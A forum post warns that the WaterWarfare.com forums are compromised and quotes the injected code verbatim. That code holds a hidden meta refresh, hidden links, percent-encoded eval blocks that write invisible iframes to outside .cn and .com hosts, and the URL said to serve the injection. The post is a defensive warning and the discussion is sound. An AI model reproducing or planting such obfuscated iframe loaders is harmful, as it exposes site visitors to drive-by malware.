Problems at WaterWarfare.com

[isoaker_com]

I meant to post this here yesterday, but got caught up in things. As the problem is still around presently, I've opted to post this here as well since some of you guys might have some ideas on what the heck this is:

Be wary when visiting the WaterWarfare.com forums currently. There seems to be some odd script that's been inserted into the forums and I'm really not sure what it's doing exactly, but it is trying to access sites with .cn and .ru addresses. I noticed an odd URL attempting to load when browsing WWc's main forum page, opened up AdAware, and noticed a bunch of odd addresses there.

Anyone know what this does apart from autoloading Google.com with potentially some invisible frames still running?

Code:

<META http-equiv=Refresh content='0; URL=http://google.com'><div style='display:none'><a href='http://xaknet.ru'>âçëîì</a> <a href='http://forum.xaknet.ru'>âçëîìàòü</a></div><script type='text/javascript'>
<!--
var msg=314,d=document;
eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%32%33%38%39%62%61%36%32%37%65%61%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%61%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%31%32%36%30%29%2b%27%66%31%62%62%5c%27%20%77%69%64%74%68%3d%32%33%33%20%68%65%69%67%68%74%3d%32%32%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') );
//-->
</script>
<iframe src='http://lskdfjlerjvm.com/arm2/index.php' width='1' height='1' style='visibility: hidden;'></iframe><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%31%63%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6c%73%6b%64%66%6a%6c%65%72%6a%76%6d%2e%63%6f%6d%2f%61%72%6d%32%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%37%32%30%29%2b%27%33%65%35%5c%27%20%77%69%64%74%68%3d%31%36%32%20%68%65%69%67%68%74%3d%36%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

This is from the following URL that has been injected into WWc:

Code:

http://tatiana-restaurant.com/photogallery14602/index.php

I do not recommend visiting that site unless you know what you might be getting yourself into. In fact, if you have an AdBlocking program, I'd recommend adding that site to it.